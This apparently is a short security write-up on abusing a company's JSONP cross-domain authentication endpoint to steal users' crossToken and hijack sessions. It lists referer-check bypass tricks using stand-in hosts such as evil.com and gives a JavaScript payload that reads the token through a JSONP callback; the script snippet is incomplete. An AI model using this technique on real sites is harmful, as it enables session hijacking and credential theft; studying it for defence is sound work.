Abusing JSONP to grab user credentials

I find that a company implements cross-domain authentication using JSONP and cookies.There is the login flow:

GET /api/cross/getsign?callback=test HTTP/1.1
Host: portal.domain.com
Referer: http://www.otherdomain.com

HTTP/1.1 200 OK
POST /api/cross/getsign HTTP/1.1
Host: www.otherdomain.com


HTTP/1.1 200 OK
set-cookie: session=xxxxxxxxxxxxxxxxxxxxxxx

The company prevents the JSONP injection via referer check.

some common referer check byapss tricks:

  • notdomian.com
  • domain.com.evil.com
  • evil.com/domain.com
  • send a blank referer

Fortunately, I can bypass it using nototherdomain.com. Then I buy it and host the malicious code there. So, I can steal the victims’ crossToken and hijack their session.


<script type="text/javascript">
function test(data) {
    var crossToken = data;
    document.write('crossToken=' + encodeURIComponent(crossToken));
<script src="http://portal.domain.com/api/cross/getsign?callback=test"></script>

Further reading: